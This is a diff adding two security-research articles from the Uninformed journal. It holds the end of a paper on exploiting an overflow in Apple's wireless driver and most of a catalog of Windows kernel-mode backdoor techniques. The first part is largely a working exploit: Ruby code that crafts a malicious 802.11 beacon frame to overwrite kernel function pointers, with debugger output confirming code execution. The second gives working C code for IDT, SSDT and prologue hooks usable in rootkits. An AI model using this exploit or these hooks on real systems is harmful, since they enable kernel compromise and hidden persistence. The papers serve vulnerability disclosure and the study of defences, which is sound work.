The following Ruby code shows how the packet described above +can be generated: + + ssid = Rex::Text.rand_text_alphanumeric(rand(255)) + bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) + seq = [rand(255)].pack('n') + xrate = make_xrate() + rsn = make_rsn() + frame = + "\x80" + + "\x00" + + "\x00\x00" + + "\xff\xff\xff\xff\xff\xff" + + bssid + + bssid + + seq + + Rex::Text.rand_text(8) + + "\xff\xff" + + Rex::Text.rand_text(2) + + #ssid tag + "\x00" + ssid.length.chr + ssid + + #supported rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + #current channel + "\x03" + "\x01" + channel.chr + + #Xrate + xrate + + #RSN + rsn + +def make_xrate + #calculate the offset that RSN needs to overwrite + staRsnOff = 0x4aee0 + kextAddr = datastore['KEXT_OFF'].to_i + staStruct = kextAddr + staRsnOff + + #build the xrate_frame + xrate_build = Rex::Text.pattern_create(240) #base of IE + + #crashes often occur in the following locations so they are blanked + xrate_build[67, 2]="\x00\x00" + xrate_build[71, 4]="\x00\x00\x00\x00" + xrate_build[79, 4]="\x00\x00\x00\x00" + + #Overwrite address for RSN element + xrate_build[55, 4]=[staStruct].pack('V') + xrate_frame = + "\x32" + + xrate_build.length.chr + + xrate_build + return xrate_frame +end + +def make_rsn + #calculate the address to overwrite the sta_default + rsnTargetOff = 0x4af20 + kextAddr = datastore['KEXT_OFF'].to_i + rsnOvrAddr = kextAddr + rsnTargetOff + + #need two bytes for alingment + rsn_pad = "\x00\x00" + + #copy the address of the payload over ever element in sta_default + rsnAddrTmp=[rsnOvrAddr].pack('V') + rsn_overwrite_addr = (rsnAddrTmp * 15) + rsn_code_size = 162 + rsn_code = ("\x90" * rsn_code_size) + rsn_code[10, 4]="\xcc\xcc\xcc\xcc" + + rsn_build = rsn_pad + rsn_overwrite_addr + rsn_code + rsn_frame = + "\x30" + + rsn_build.length.chr + + rsn_build + return rsn_frame +end + +After firing off this packet, the debugger breaks on a breakpoint trap: + +(gdb) c +Continuing. + +Program received signal SIGTRAP, Trace/breakpoint trap. +0x00931f2b in chanflags () +2: x/i $eip 0x931f2b : int3 +(gdb) info registers +eax 0x931ee0 9641696 +ecx 0x431bde83 1125899907 +edx 0x0 0 +ebx 0x31cf9 204025 +esp 0xc863ed8 0xc863ed8 +ebp 0xc863f64 0xc863f64 +esi 0x380346c 58733676 +edi 0x3801004 58724356 +eip 0x931f2b 0x931f2b +eflags 0x246 582 +cs 0x8 8 +ss 0x10 16 +ds 0x10 16 +es 0xa4810010 -1535049712 +fs 0x10 16 +gs 0x12260048 304480328 +(gdb) x/i $eip +0x931f2b : int3 +(gdb) x/i $eip-1 +0x931f2a : int3 +(gdb) x/i $eip-2 +0x931f29 : nop +(gdb) + +The previous instruction was an int 3 and before that was a NOP. This proves +that the code execution test was successful. As it stands one needs 64 bytes +to overwrite stadefault and the RSN buffer has to be 48 bytes long which +leaves 160 bytes for first stage shellcode. This is more than enough to +locate and execute a second stage. + +In other words, the Apple driver will copy five IEs from the original packet. +One can cause an overflow in one of these elements, the Extended Rate IE, to +overwrite structures that determine how the remaining four elements are +copied. The copy of the RSN IE is chosen to make it possible to overwrite +function pointers and store a first stage shellcode. The remaining three IEs, +roughly 765 bytes in total, can be used to contain the real shellcode that +does something useful, such as a connect-back shell, add a root user account, +or play fun sounds on the speaker. 
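+
+To recap the ieee80211_saveie trick in isolation, the following user-mode C
+program is a minimal simulation of the relevant check. It is illustrative
+only and is not driver code: the region array, the slot variable, and the
+simplified saveie function are stand-ins invented for this sketch, with the
+values modeled on the debugger output shown earlier. Because the
+attacker-supplied IE's length byte matches the byte found at the
+destination address plus one, the allocation branch is skipped and the
+memcpy lands directly on the fake function pointer table.
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+/* Stand-in for the memory at sta_default. The 0xe0 at offset 1 mimics the
+   second byte of the first entry, 0x0092e050, as stored little-endian. */
+static unsigned char region[0x100] = { 0x50, 0xe0, 0x92, 0x00 };
+
+/* Same logic as the Madwifi ieee80211_saveie() shown earlier, with the
+   kernel MALLOC/FREE macros replaced by malloc/free. */
+static void saveie(unsigned char **iep, const unsigned char *ie)
+{
+    unsigned int ielen = ie[1] + 2;
+
+    if (*iep == NULL || (*iep)[1] != ie[1]) {
+        if (*iep != NULL)
+            free(*iep);
+        *iep = malloc(ielen);
+    }
+    if (*iep != NULL)
+        memcpy(*iep, ie, ielen);
+}
+
+int main(void)
+{
+    unsigned char ie[0xe0 + 2];
+    unsigned char *slot = region; /* the saved-IE pointer, already
+                                     redirected at the table by the
+                                     Extended Rate overflow */
+    unsigned int entry;
+
+    ie[0] = 0x30;                 /* RSN element ID */
+    ie[1] = region[1];            /* match the byte at destination + 1 */
+    memset(ie + 2, 0x41, sizeof(ie) - 2);
+
+    saveie(&slot, ie);            /* no allocation: 0xe2 bytes are copied
+                                     straight over the table */
+
+    memcpy(&entry, region + 4, sizeof(entry));
+    printf("second table entry is now 0x%08x\n", entry);
+    return 0;
+}
+
+Under these assumptions the program prints 0x41414141, mirroring the way
+every member of sta_default ends up pointing at attacker-controlled data in
+the real driver.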
+
+7) Acknowledgements
+
+The author would like to thank a few different people for the massive
+amount of help. Jon Ellch taught me how to do wireless injection and driver
+auditing. His wife explained public key cryptography to me (``You see, it's
+really just a complex math problem with REALLY big numbers''). Josh Wright
+and Mike Kershaw wrote and released LORCON, which is the basis for
+everything I have done. Rob Graham is awesome. HD Moore, Matt Miller, and
+the Metasploit project provide a simple-to-use, extensible exploit
+framework that can bring things like driver vulnerabilities to the masses.
+Porting this exploit to Metasploit was pretty much a snap. Almost all of
+the Metasploit examples for the Atheros overflow were derived from HD
+Moore's fuzzbeacon.rb script. Rich Mogull provided edits and advice.
+
+8) Conclusion
+
+This paper has given a quick walk-through of a real vulnerability in
+Apple's wireless driver in terms of discovery and exploitation. Getting
+code execution is only one part of an exploit. To do something useful, an
+attacker needs kernel-mode shellcode. That subject will be covered in a
+future paper.
+
+The exploit discussed in this paper is just a proof-of-concept since, as it
+stands now, one needs to know the load address of the kernel module on the
+target machine. This is a choice, not a restriction. This method of gaining
+execution is well suited to a proof-of-concept. Creation of a weaponized
+exploit that can execute arbitrary code with no prior knowledge is just as
+easy; it is just a matter of overwriting different parts of the kernel.
+
+If the reader is interested in OS X kernel shellcode design, be sure to
+review the example scripts that contain different payloads that could be
+packed into the RSN IE and other optional elements.
diff --git a/uninformed/8.5.txt b/uninformed/8.5.txt
new file mode 100644
index 0000000..e3d18f8
--- /dev/null
+++ b/uninformed/8.5.txt
@@ -0,0 +1,1822 @@
+A Catalog of Local Windows Kernel-mode Backdoor Techniques
+August, 2007
+skape & Skywing
+mmiller@hick.org & Skywing@valhallalegends.com
+
+Abstract: This paper presents a detailed catalog of techniques that can be
+used to create local kernel-mode backdoors on Windows. These techniques
+include function trampolines, descriptor table hooks, model-specific
+register hooks, page table modifications, as well as others that have not
+previously been described. The majority of these techniques have been
+publicly known far in advance of this paper. However, at the time of this
+writing, there appears to be no detailed single point of reference for many
+of them. The intention of this paper is to provide a solid understanding on
+the subject of local kernel-mode backdoors.
This understanding is necessary in order to encourage the thoughtful
+discussion of potential countermeasures and perceived advancements. In the
+vein of countermeasures, some additional thoughts are given to the common
+misconception that PatchGuard, in its current design, can be used to
+prevent kernel-mode rootkits.
+
+1) Introduction
+
+The classic separation of privileges between user-mode and kernel-mode has
+been a common feature included in most modern operating systems. This
+separation allows operating systems to make security guarantees relating to
+process isolation, kernel-user isolation, kernel-mode integrity, and so on.
+These security guarantees are needed in order to prevent a lesser
+privileged user-mode process from being able to take control of the system
+itself. A kernel-mode backdoor is one method of bypassing these security
+restrictions.
+
+There are many different techniques that can be used to backdoor the
+kernel. For the purpose of this document, a backdoor will be considered to
+be something that provides access to resources that would otherwise
+normally be restricted by the kernel. These resources might include
+executing code with kernel-mode privileges, accessing kernel-mode data,
+disabling security checks, and so on. To help further limit the scope of
+this document, the authors will focus strictly on techniques that can be
+used to provide local backdoors into the kernel on Windows. In this
+context, a local backdoor is a backdoor that does not rely on or make use
+of a network connection to provide access to resources. Instead, local
+backdoors can be viewed as ways of weakening the kernel in an effort to
+provide access to resources from non-privileged entities, such as
+user-mode processes.
+
+The majority of the backdoor techniques discussed in this paper have been
+written about at length and in great detail in many different
+publications[20, 8, 12, 18, 19, 21, 25, 26]. The primary goal of this paper
+is to act as a point of reference for some of the common, as well as some
+of the not-so-common, local kernel-mode backdoor techniques. The authors
+have attempted to include objective measurements for each technique along
+with a description of how each technique works. As a part of defining
+these objective measurements, the authors have attempted to research the
+origins of some of the more well-known backdoor techniques. Since many of
+these techniques have been used for such a long time, the origins have
+proven somewhat challenging to uncover.
+
+The structure of this paper is as follows. First, each of the individual
+techniques that can be used to provide a local kernel-mode backdoor is
+discussed in detail. This is followed by a brief discussion of general
+strategies that might be employed to prevent some of the techniques that
+are discussed, and by an attempt to refute some of the common arguments
+against preventing kernel-mode backdoors in and of themselves. Finally, the
+paper attempts to clarify why Microsoft's PatchGuard should not be
+considered a security solution with respect to kernel-mode backdoors.
+
+2) Techniques
+
+To help properly catalog the techniques described in this section, the
+authors have attempted to include objective measurements of each
+technique. These measurements are broken down as follows:
+
+- Category
+
+ The authors have chosen to adopt Joanna Rutkowska's malware categorization
+ in the interest of pursuing a standardized classification[34]. This model
+ describes four types of malware.
Type 0 malware categorizes non-intrusive malware; + Type I includes malware that modifies things that should otherwise never be + modified (code segments, MSRs, etc); Type II includes malware that modifies + things that should be modified (global variables, other data); Type III is not + within the scope of this document[33, 34]. + + In addition to the four malware types described by Rutkowska, the authors + propose Type IIa which would categorize writable memory that should + effectively be considered write-once in a given context. For example, when a + global DPC is initialized, the DpcRoutine can be considered write-once. The + authors consider this to be a derivative of Type II due to the fact that the + memory remains writable and is less likely to be checked than that of Type I. + +- Origin + + If possible, the first known instance of the technique's use or some + additional background on its origin is given. + +- Capabilities + + The capabilities the backdoor offers. This can be one or more of the + following: kernel-mode code execution, access to kernel-mode data, access to + restricted resources. If a technique allows kernel-mode code execution, + then it implicitly has all other capabilities listed. + +- Considerations + + Any restrictions or special points that must be made about the use of a + given technique. + +- Covertness + + A description of how easily the use of a given technique might be detected. + +Since many of the techniques described in this document have been known for +quite some time, the authors have taken a best effort approach to identifying +sources of the original ideas. In many cases, this has proved to be difficult +or impossible. For this reason, the authors request that any inaccuracy in +citation be reported so that it may be corrected in future releases of this +paper. + +2.1) Image Patches + +Perhaps the most obvious approach that can be used to backdoor the kernel +involves the modification of code segments used by the kernel itself. This +could include modifying the code segments of kernel-mode images like +ntoskrnl.exe, ndis.sys, ntfs.sys, and so on. By making modifications to these +code segments, it is possible to hijack kernel-mode execution whenever a +hooked function is invoked. The possibilities surrounding the modification of +code segments are limited only by what the kernel itself is capable of doing. + +2.1.1) Function Prologue Hooking + +Function hooking is the process of intercepting calls to a given function by +redirecting those calls to an alternative function. The concept of function +hooking has been around for quite some time and it's unclear who originally +presented the idea. There are a number of different libraries and papers that +exist which help to facilitate the hooking of functions[21]. With respect to +local kernel-mode backdoors, function hooking is an easy and reliable method +of creating a backdoor. There are a few different ways in which functions can +be hooked. One of the most common techniques involves overwriting the +prologue of the function to be hooked with an architecture-specific jump +instruction that transfers control to an alternative function somewhere else +in memory. This is the approach taken by Microsoft's Detours library. While +prologue hooks are conceptually simple, there is actually quite a bit of code +needed to implement them properly. 
+ +In order to implement a prologue hook in a portable and reliable manner, it is +often necessary to make use of a disassembler that is able to determine the +size, in bytes, of individual instructions. The reason for this is that in +order to perform the prologue overwrite, the first few bytes of the function +to be hooked must be overwritten by a control transfer instruction (typically +a jump). On the Intel architecture, control transfer instructions can have +one of three operands: a register, a relative offset, or a memory operand. +Each operand type controls the size of the jump instruction that will be +needed: 2 bytes, 5 bytes, and 6 bytes, respectively. The disassembler makes +it possible to copy the first n instructions from the function's prologue +prior to performing the overwrite. The value of n is determined by +disassembling each instruction in the prologue until the number of bytes +disassembled is greater than or equal to the number of bytes that will be +overwritten when hooking the function. + +The reason the first n instructions must be saved in their entirety is to make +it possible for the original function to be called by the hook function. In +order to call the original version of the function, a small stub of code must +be generated that will execute the first n instructions of the function's +original prologue followed by a jump to instruction n + 1 in the original +function's body. This stub of code has the effect of allowing the original +function to be called without it being diverted by the prologue overwrite. +This method of implementing function prologue hooks is used extensively by +Detours and other hooking libraries[21]. + +Recent versions of Windows, such as XP SP2 and Vista, include image files that +come with a more elegant way of hooking a function with a function prologue +overwrite. In fact, these images have been built with a compiler enhancement +that was designed specifically to improve Microsoft's ability to hook its own +functions during runtime. The enhancement involves creating functions with a +two byte no-op instruction, such as a mov edi, edi, as the first instruction +of a function's prologue. In addition to having this two byte instruction, +the compiler also prefixes 5 no-op instructions to the function itself. The +two byte no-op instruction provides the necessary storage for a two byte +relative short jump instruction to be placed on top of it. The relative short +jump, in turn, can then transfer control into another relative jump +instruction that has been placed in the 5 bytes that were prefixed to the +function itself. The end result is a more deterministic way of hooking a +function using a prologue overwrite that does not rely on a disassembler. A +common question is why a two byte no-op instruction was used rather than two +individual no-op instructions. The answer for this has two parts. First, a +two byte no-op instruction can be overwritten in an atomic fashion whereas +other prologue overwrites, such as a 5 byte or 6 byte overwrite, cannot. The +second part has to do with the fact that having a two byte no-op instruction +prevents race conditions associated with any thread executing code from within +the set of bytes that are overwritten when the hook is installed. This race +condition is common to any type of function prologue overwrite. + +To better understand this race condition, consider what might happen if the +prologue of a function had two single byte no-op instructions. 
Prior to this +function being hooked, a thread executes the first no-op instruction. In +between the execution of this first no-op and the second no-op, the function +in question is hooked in the context of a second thread and the first two +bytes are overwritten with the opcodes associated with a relative short jump +instruction, such as 0xeb and 0xf9. After the prologue overwrite occurs, the +first thread begins executing what was originally the second no-op +instruction. However, now that the function has been hooked, the no-op +instruction may have been changed from 0x90 to 0xf9. This may have disastrous +effects depending on the context that the hook is executed in. While this +race condition may seem unlikely, it is nevertheless feasible and can +therefore directly impact the reliability of any solution that uses prologue +overwrites in order to hook functions. + +Category: Type I + +Origin: The concept of patching code has ``existed since the dawn of digital +computing''[21]. + +Capabilities: Kernel-mode code execution + +Considerations: The reliability of a function prologue hook is directly +related to the reliability of the disassembler used and the number of bytes +that are overwritten in a function prologue. If the two byte no-op +instruction is not present, then it is unlikely that a function prologue +overwrite will be able to be multiprocessor safe. Likewise, if a disassembler +does not accurately count the size of instructions in relation to the actual +processor, then the function prologue hook may fail, leading to an unexpected +crash of the system. One other point that is worth mentioning is that authors +of hook functions must be careful not to inadvertently introduce instability +issues into the operating system by failing to properly sanitize and check +parameters to the function that is hooked. There have been many examples +where legitimate software has gone the route of hooking functions without +taking these considerations into account[38]. + +Covertness: At the time of this writing, the use of function prologue +overwrites is considered to not be covert. It is trivial for tools, such as +Joanna Rutkowska's System Virginity Verifier[32], to compare the in-memory version +of system images with the on-disk versions in an effort to detect in-memory +alterations. The Windows Debugger (windbg) will also make an analyst aware of +differences between in-memory code segments and their on-disk counterparts. + +2.1.2) Disabling SeAccessCheck + +In Phrack 55, Greg Hoglund described the benefits of patching nt!SeAccessCheck +so that it never returns access denied[19]. This has the effect of causing access +checks on securable objects to always grant access, regardless of whether or +not the access would normally be granted. As a result, non-privileged users +can directly access otherwise privileged resources. This simple modification +does not directly make it possible to execute privileged code, but it does +indirectly facilitate it by allowing non-privileged users to interact with and +modify system processes. + +Category: Type I + +Origin: Greg Hoglund was the first person to publicly identify this technique +in September, 1999[19]. + +Capabilities: Access to restricted resources. + +Covertness: Like function prologue overwrites, the nt!SeAccessCheck patch can +be detected through differences between the mapped image of ntoskrnl.exe and +the on-disk version. 
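+
+To make the hot-patchable case described in the function prologue hooking
+discussion above more concrete, the following is a minimal sketch of such a
+hook on 32-bit x86. It assumes the target function begins with the two byte
+mov edi, edi no-op and is preceded by five bytes of padding; the function
+name is illustrative, and the steps required to make the code pages
+writable (and to flush any cached instructions) are omitted.
+
+static void InstallHotPatchHook(unsigned char *Function, void *Hook)
+{
+    unsigned char *Padding = Function - 5;
+
+    /* Place "jmp rel32" (0xE9 <rel32>) to the hook function in the five
+       bytes of padding that precede the function. The displacement is
+       relative to the end of this jump, which is the function itself. */
+    Padding[0] = 0xE9;
+    *(int *)(Padding + 1) = (int)((unsigned char *)Hook - Function);
+
+    /* Atomically replace "mov edi, edi" with a two byte short jump back
+       into the padding ("jmp $-5", 0xEB 0xF9). Because this is a single
+       aligned two byte store, the race condition described above is
+       avoided. */
+    *(volatile unsigned short *)Function = 0xF9EB;
+
+    /* The original function remains callable at Function + 2, just past
+       the overwritten two byte no-op. */
+}
+
+On images that were not built with the hot-patch padding, the
+disassembler-based approach described earlier is still necessary in order
+to relocate the overwritten prologue instructions.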
+ +2.2) Descriptor Tables + +The x86 architecture has a number of different descriptor tables that are used +by the processor to handle things like memory management (GDT), interrupt +dispatching (IDT), and so on. In addition to processor-level descriptor +tables, the Windows operating system itself also includes a number of distinct +software-level descriptor tables, such as the SSDT. The majority of these +descriptor tables are heavily relied upon by the operating system and +therefore represent a tantalizing target for use in backdoors. Like the +function hooking technique described in , all of the techniques presented in +this subsection have been known about for a significant amount of time. The +authors have attempted, when possible, to identify the origins of each +technique. + +2.2.1) IDT + +The Interrupt Descriptor Table (IDT) is a processor-relative structure that is +used when dispatching interrupts. Interrupts are used by the processor as a +means of interrupting program execution in order to handle an event. +Interrupts can occur as a result of a signal from hardware or as a result of +software asserting an interrupt through the int instruction[23]. The IDT contains +256 descriptors that are associated with the 256 interrupt vectors supported +by the processor. Each IDT descriptor can be one of three types of gate +descriptors (task, interrupt, trap) which are used to describe where and how +control should be transferred when an interrupt for a particular vector +occurs. The base address and limit of the IDT are stored in the idtr register +which is populated through the lidt instruction. The current base address and +limit of the idtr can be read using the sidt instruction. + +The concept of an IDT hook has most likely been around since the origin of the +concept of interrupt handling. In most cases, an IDT hook works by +redirecting the procedure entry point for a given IDT descriptor to an +alternative location. Conceptually, this is the same process involved in +hooking any function pointer (which is described in more detail in ). The +difference comes as a result of the specific code necessary to hook an IDT +descriptor. + +On the x86 processor, each IDT descriptor is an eight byte data structure. +IDT descriptors that are either an interrupt gate or trap gate descriptor +contain the procedure entry point and code segment selector to be used when +the descriptor's associated interrupt vector is asserted. In addition to +containing control transfer information, each IDT descriptor also contains +additional flags that further control what actions are taken. The Windows +kernel describes IDT descriptors using the following structure: + +kd> dt _KIDTENTRY + +0x000 Offset : Uint2B + +0x002 Selector : Uint2B + +0x004 Access : Uint2B + +0x006 ExtendedOffset : Uint2B + +In the above data structure, the Offset field holds the low 16 bits of the +procedure entry point and the ExtendedOffset field holds the high 16 bits. +Using this knowledge, an IDT descriptor could be hooked by redirecting the +procedure entry point to an alternate function. 
The following code +illustrates how this can be accomplished: + +typedef struct _IDT +{ + USHORT Limit; + PIDT_DESCRIPTOR Descriptors; +} IDT, *PIDT; + +static NTSTATUS HookIdtEntry( + IN UCHAR DescriptorIndex, + IN ULONG_PTR NewHandler, + OUT PULONG_PTR OriginalHandler OPTIONAL) +{ + PIDT_DESCRIPTOR Descriptor = NULL; + IDT Idt; + + __asm sidt [Idt] + + Descriptor = &Idt.Descriptors[DescriptorIndex]; + + *OriginalHandler = + (ULONG_PTR)(Descriptor->OffsetLow + + (Descriptor->OffsetHigh << 16)); + + Descriptor->OffsetLow = + (USHORT)(NewHandler & 0xffff); + Descriptor->OffsetHigh = + (USHORT)((NewHandler >> 16) & 0xffff); + + __asm lidt [Idt] + + return STATUS_SUCCESS; +} + +In addition to hooking an individual IDT descriptor, the entire IDT can be +hooked by creating a new table and then setting its information using the lidt +instruction. + +Category: Type I; although some portions of the IDT may be legitimately +hooked. + +Origin: The IDT hook has its origins in Interrupt Vector Table (IVT) hooks. +In October, 1999, Prasad Dabak et al wrote about IVT hooks[31]. Sadly, they also +seemingly failed to cite their sources. It's certain that IVT hooks have +existed prior to 1999. The oldest virus citation the authors could find was +from 1994, but DOS was released in 1981 and it is likely the first IVT hooks +were seen shortly thereafter. A patent that was filed in December, 1985 +entitled Dual operating system computer talks about IVT ``relocation'' in a +manner that suggests IVT hooking of some form. + +Capabilities: Kernel-mode code execution. + +Covertness: Detection of IDT hooks is often trivial and is a common practice +for rootkit detection tools[32]. + +2.2.2) GDT / LDT + +The Global Descriptor Table (GDT) and Local Descriptor Table (LDT) are used to +store segment descriptors that describe a view of a system's address space. +Each processor has its own GDT. Segment descriptors include the base address, +limit, privilege information, and other flags that are used by the processor +when translating a logical address (seg:offset) to a linear address. Segment +selectors are integers that are used to indirectly reference individual +segment descriptors based on their offset into a given descriptor table. +Software makes use of segment selectors through segment registers, such as CS, +DS, ES, and so on. More detail about the behavior on segmentation can be +found in the x86 and x64 system programming manuals[1]. + +In Phrack 55, Greg Hoglund described the potential for abusing conforming code +segments[19]. A conforming code segment, as opposed to a non-conforming code +segment, permits control transfers where CPL is numerically greater than DPL. +However, the CPL is not altered as a result of this type of control transfer. +As such, effective privileges of the caller are not changed. For this reason, +it's unclear how this could be used to access kernel-mode memory due to the +fact that page protections would still prevent lesser privileged callers from +accessing kernel-mode pages when paging is enabled. + +Derek Soeder identified an awesome flaw in 2003 that allowed a user-mode +process to create an expand-down segment descriptor in the calling process' +LDT[40]. An expand-down segment descriptor inverts the meaning of the limit and +base address associated with a segment descriptor. In this way, the limit +describes the lower limit and the base address describes the upper limit. 
The reason this is useful is that when kernel-mode routines validate
+addresses passed in from user-mode, they assume flat segments that start at
+base address zero. This is the same thing as assuming that a logical
+address is equivalent to a linear address. However, when expand-down
+segment descriptors are used, the linear address will reference a memory
+location that can be in stark contrast to the address that's being
+validated by kernel-mode. In order to exploit this condition to escalate
+privileges, all that's necessary is to identify a system service in
+kernel-mode that will run with escalated privileges and make use of segment
+selectors provided by user-mode without properly validating them. Derek
+gives an example of a MOVS instruction in the int 0x2e handler. This trick
+can be abused in the context of a local kernel-mode backdoor to provide a
+way for user-mode code to be able to read and write kernel-mode memory.
+
+In addition to abusing specific flaws in the way memory can be referenced
+through the GDT and LDT, it's also possible to define custom gate
+descriptors that would make it possible to call code in kernel-mode from
+user-mode[23]. One particularly useful type of gate descriptor, at least in
+the context of a backdoor, is a call gate descriptor. The purpose of a call
+gate is to allow lesser privileged code to call more privileged code in a
+secure fashion[45]. To abuse this, a backdoor can simply define its own
+call gate descriptor and then make use of it to run code in the context of
+the kernel.
+
+Category: Type IIa; with the exception of the LDT. The LDT may be better
+classified as Type II considering it exposes an API to user-mode that
+allows the creation of custom LDT entries (NtSetLdtEntries).
+
+Origin: It's unclear if there were some situational requirements that would
+be needed in order to abuse the issue described by Greg Hoglund. The flaw
+identified by Derek Soeder in 2003 was an example of a recurrence of an
+issue that was found in older versions of other operating systems, such as
+Linux. For example, a mailing list post made by Morten Welinder to LKML in
+1996 describes a fix for what appears to be the same type of issue that was
+identified by Derek[44]. Custom gate descriptors have also been used in the
+context of backdoors in the past; Greg Hoglund described the use of call
+gates in the context of a rootkit in 1999[19].
+
+Capabilities: In the case of the expand-down segment descriptor, access to
+kernel-mode data is possible. This can also indirectly lead to kernel-mode
+code execution, but it would rely on another backdoor technique. If a gate
+descriptor is abused, direct kernel-mode code execution is possible.
+
+Covertness: It is entirely possible to write code that will detect the
+addition or alteration of entries in the GDT or each individual process
+LDT. For example, PatchGuard will currently detect alterations to the GDT.
+
+2.2.3) SSDT
+
+The System Service Descriptor Table (SSDT) is used by the Windows kernel
+when dispatching system calls. The SSDT itself is exported in kernel-mode
+through the nt!KeServiceDescriptorTable global variable. This variable
+contains information relating to system call tables that have been
+registered with the operating system. In contrast to other operating
+systems, the Windows kernel supports the dynamic registration
+(nt!KeAddSystemServiceTable) of new system call tables at runtime.
The two most common system call tables are those used +for native and GDI system calls. + +In the context of a local kernel-mode backdoor, system calls represent an +obvious target due to the fact that they are implicitly tied to the privilege +boundary that exists between user-mode and kernel-mode. The act of hooking a +system call handler in kernel-mode makes it possible to expose a privileged +backdoor into the kernel using the operating system's well-defined system call +interface. Furthermore, hooking system calls makes it possible for the +backdoor to alter data that is seen by user-mode and thus potentially hide its +presence to some degree. + +In practice, system calls can be hooked on Windows using two distinct +strategies. The first strategy involves using generic function hooking +techniques which are described in . The second strategy involves using the +function pointer hooking technique which is described in . Using the function +pointer hooking involves simply altering the function pointer associated with +a specific system call index by accessed the system call table which contains +the system call that is to be hooked. + +The following code shows a very simple illustration of how one might go about +hooking a system call in the native system call table on 32-bit versions of +Windows System call hooking on 64-bit versions of Windows would require +PatchGuard to be disabled: + +PVOID HookSystemCall( + PVOID SystemCallFunction, + PVOID HookFunction) +{ + ULONG SystemCallIndex = + *(ULONG *)((PCHAR)SystemCallFunction+1); + PVOID *NativeSystemCallTable = + KeServiceDescriptorTable[0]; + PVOID OriginalSystemCall = + NativeSystemCallTable[SystemCallIndex]; + + NativeSystemCallTable[SystemCallIndex] = HookFunction; + + return OriginalSystemCall; +} + +Category: Type I if prologue hook is used. Type IIa if the function pointer +hook is used. The SSDT (both native and GDI) should effectively be considered +write-once. + +Origin: System call hooking has been used extensively for quite some time. +Since this technique has become so well-known, its actual origins are unclear. +The earliest description the authors could find was from M. B. Jones in a +paper from 1993 entitled Interposition agents: Transparently interposing user +code at the system interface[27]. Jones explains in his section on related work +that he was unable to find any explicit research on the subject prior of +agent-based interposition prior to his writing. However, it seems clear that +system calls were being hooked in an ad-hoc fashion far in advance of this +point. The authors were unable to find many of the papers cited by Jones. +Plaguez appears to be one of the first (Jan, 1998) to publicly illustrate the +usefulness of system call hooking in Linux with a specific eye toward security +in Phrack 52[30]. + +Capabilities: Kernel-mode code execution. + +Considerations: On certain versions of Windows XP, the SSDT is marked as +read-only. This must be taken into account when attempting to write to the +SSDT across multiple versions of Windows. + +Covertness: System call hooks on Windows are very easy to detect. Comparing +the in-memory SSDTs with the on-disk versions is one of the most common +strategies employed. + +2.3) Model-specific Registers + +Intel processors support a special category of processor-specific registers +known as Model-specific Registers (MSRs). MSRs provide software with the +ability to control various hardware and software features. 
Unlike other +registers, MSRs are tied to a specific processor model and are not guaranteed +to be supported in future versions of a processor line. Some of the features +that MSRs offer include enhanced performance monitoring and debugging, among +other things. Software can read MSRs using the rdmsr instruction and write +MSRs using the wrmsr[23]. + +This subsection will describe some of the MSRs that may be useful in the +context of a local kernel-mode backdoor. + +2.3.1) IA32_SYSENTER_EIP + +The Pentium II introduced enhanced support for transitioning between user-mode +and kernel-mode. This support was provided through the introduction of two +new instructions: sysenter and sysexit. AMD processors also introduced enhanced +new instructions to provide this feature. When a user-mode application wishes +to transition to kernel-mode, it issues the sysenter instruction. When the +kernel is ready to return to user-mode, it issues the sysexit instruction. +Unlike the the call instruction, the sysenter instruction takes no operands. +Instead, this instruction uses three specific MSRs that are initialized by the +operating system as the target for control transfers[23]. + +The IA32_SYSENTER_CS (0x174) MSR is used by the processor to set the kernel-mode +CS. The IA32_SYSENTER_EIP (0x176) MSR contains the virtual address of the +kernel-mode entry point that code should begin executing at once the +transition has completed. The third MSR, IA32_SYSENTER_ESP (0x175), contains +the virtual address that the stack pointer should be set to. Of these three +MSRs, IA32_SYSENTER_EIP is the most interesting in terms of its potential for +use in the context of a backdoor. Setting this MSR to the address of a +function controlled by the backdoor makes it possible for the backdoor to +intercept all system calls after they have trapped into kernel-mode. This +provides a very powerful vantage point. + +For more information on the behavior of the sysenter and sysexit instructions, +the reader should consult both the Intel manuals and John Gulbrandsen's +article[23, 15]. + +Category: Type I + +Origin: This feature is provided for the explicit purpose of allowing an +operating system to control the behavior of the sysenter instruction. As +such, it is only logical that it can also be applied in the context of a +backdoor. Kimmo Kasslin mentions a virus from December, 2005 that made use of +MSR hooks[25]. Earlier that year in February, fuzenop from rootkit.com released a +proof of concept[12]. + +Capabilities: Kernel-mode code execution + +Considerations: This technique is restricted by the fact that not all +processors support this MSR. Furthermore, user-mode processes are not +necessarily required to use it in order to transition into kernel-mode when +performing a system call. These facts limit the effectiveness of this +technique as it is not guaranteed to work on all machines. + +Covertness: Changing the value of the IA32_SYSENTER_EIP MSR can be detected. +For example, PatchGuard currently checks to see if the equivalent AMD64 MSR +has been modified as a part of its polling checks[36]. 

Category: Type I

Origin: This feature is provided for the explicit purpose of allowing an
operating system to control the behavior of the sysenter instruction. As
such, it is only logical that it can also be applied in the context of a
backdoor. Kimmo Kasslin mentions a virus from December, 2005 that made use of
MSR hooks[25]. Earlier that year in February, fuzenop from rootkit.com released a
proof of concept[12].

Capabilities: Kernel-mode code execution.

Considerations: This technique is restricted by the fact that not all
processors support this MSR. Furthermore, user-mode processes are not
necessarily required to use it in order to transition into kernel-mode when
performing a system call. These facts limit the effectiveness of this
technique as it is not guaranteed to work on all machines.

Covertness: Changing the value of the IA32_SYSENTER_EIP MSR can be detected.
For example, PatchGuard currently checks to see if the equivalent AMD64 MSR
has been modified as a part of its polling checks[36]. It is more difficult for
third party vendors to perform this check due to the simple fact that the
default value for this MSR is an unexported symbol named nt!KiFastCallEntry:

kd> rdmsr 176
msr[176] = 00000000`804de6f0
kd> u 00000000`804de6f0
nt!KiFastCallEntry:
804de6f0 b923000000 mov ecx,23h

Without having symbols, third parties have a more difficult time
distinguishing between a value that is sane and one that is not.

2.4) Page Table Entries

When operating in protected mode, x86 processors support virtualizing the
address space through the use of a feature known as paging. The paging
feature makes it possible to virtualize the address space by adding a
translation layer between linear addresses and physical addresses. When paging
is not enabled, linear addresses are equivalent to physical addresses. To
translate addresses, the processor uses portions of the address being
referenced to index directories and tables that convey flags and physical
address information that describe how the translation should be performed.
The majority of the details on how this translation is performed are outside
of the scope of this document. If necessary, the reader should consult
section 3.7 of the Intel System Programming Manual[23]. Many other papers in the
references also discuss this topic[41].

The paging system is particularly interesting due to its potential for abuse
in the context of a backdoor. When the processor attempts to translate a
